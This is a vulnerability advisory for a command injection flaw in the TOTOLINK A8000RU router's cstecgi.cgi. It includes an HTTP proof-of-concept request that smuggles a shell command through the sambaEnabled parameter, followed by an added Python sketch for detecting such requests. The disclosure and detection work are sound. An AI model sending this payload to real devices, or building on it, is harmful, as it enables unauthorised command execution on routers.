# Summary of Command Injection Vulnerability in A8000RU

## Vulnerability Overview

A command injection vulnerability was discovered in the `cstecgi.cgi` script of the TOTOLINK A8000RU router. Attackers can exploit the `sambaEnabled` parameter to inject arbitrary operating system commands by crafting malicious requests.

## Affected Scope

* **Vendor**: TOTOLINK
* **Product**: A8000RU
* **Version**: 7.1.c1.643_b20200521

## Remediation

* The page does not provide specific remediation steps or patch information.

## Proof of Concept (PoC)

**HTTP Request Example:**

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.6.2
Content-Length: 77
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.6.2
Referer: http://192.168.6.2/basic/index.html
Accept-Encoding: gzip, deflate, br
Cookie: SESSION_ID=1772400702:2
Connection: keep-alive

{"topicUrl":"setStorageCfg","sambaEnabled":"\ls>./setStorageCfg.txt"}
```

**Exploitation Principle:**

By setting the `sambaEnabled` parameter to `\ls>./setStorageCfg.txt`, the router executes this command, thereby generating a `setStorageCfg.txt` file in the directory containing the list of files.
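
A detection sketch for the request shown above, added here as an example (it is not from the original advisory or from TOTOLINK). It flags `setStorageCfg` requests to `cstecgi.cgi` whose `sambaEnabled` value is not a plain toggle, and it handles the fact that the PoC body is not strictly valid JSON. The function names, the sample requests and the assumption that legitimate values are short alphanumeric toggles such as `"0"` or `"1"` are this example's own.

```python
import json
import re

# Assumption: a legitimate sambaEnabled value is a short alphanumeric toggle
# such as "0" or "1"; the page does not document the expected values.
SAFE_VALUE = re.compile(r"[A-Za-z0-9]{0,8}")
# Fallback extractors for bodies that strict JSON parsing rejects.
RAW_TOPIC = re.compile(r'"topicUrl"\s*:\s*"([^"]*)"')
RAW_FIELD = re.compile(r'"sambaEnabled"\s*:\s*"((?:[^"\\]|\\.)*)"', re.S)


def extract_samba_value(body):
    """Return (topicUrl, sambaEnabled) from a cstecgi.cgi request body."""
    try:
        doc = json.loads(body)
        if isinstance(doc, dict):
            return doc.get("topicUrl"), doc.get("sambaEnabled")
    except ValueError:
        pass
    # The PoC body contains "\l", an invalid JSON escape, so json.loads()
    # rejects it; fall back to regexes instead of skipping the request.
    topic = RAW_TOPIC.search(body)
    value = RAW_FIELD.search(body)
    return (topic.group(1) if topic else None,
            value.group(1) if value else None)


def is_suspicious(path, body):
    """Flag setStorageCfg requests whose sambaEnabled is not a plain toggle."""
    if not path.endswith("/cgi-bin/cstecgi.cgi"):
        return False
    topic, value = extract_samba_value(body)
    if topic != "setStorageCfg" or value is None:
        return False
    # Non-string values (numbers, objects) are also treated as anomalies.
    return not (isinstance(value, str) and SAFE_VALUE.fullmatch(value))


# Constructed sample requests; the second body is the one from the PoC above.
SAMPLES = [
    ("/cgi-bin/cstecgi.cgi", '{"topicUrl":"setStorageCfg","sambaEnabled":"1"}'),
    ("/cgi-bin/cstecgi.cgi",
     r'{"topicUrl":"setStorageCfg","sambaEnabled":"\ls>./setStorageCfg.txt"}'),
    ("/basic/index.html", ""),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(is_suspicious(path, body), body)
```

A log pipeline that silently drops bodies failing strict JSON parsing would miss this request, which is why the regex fallback matters here.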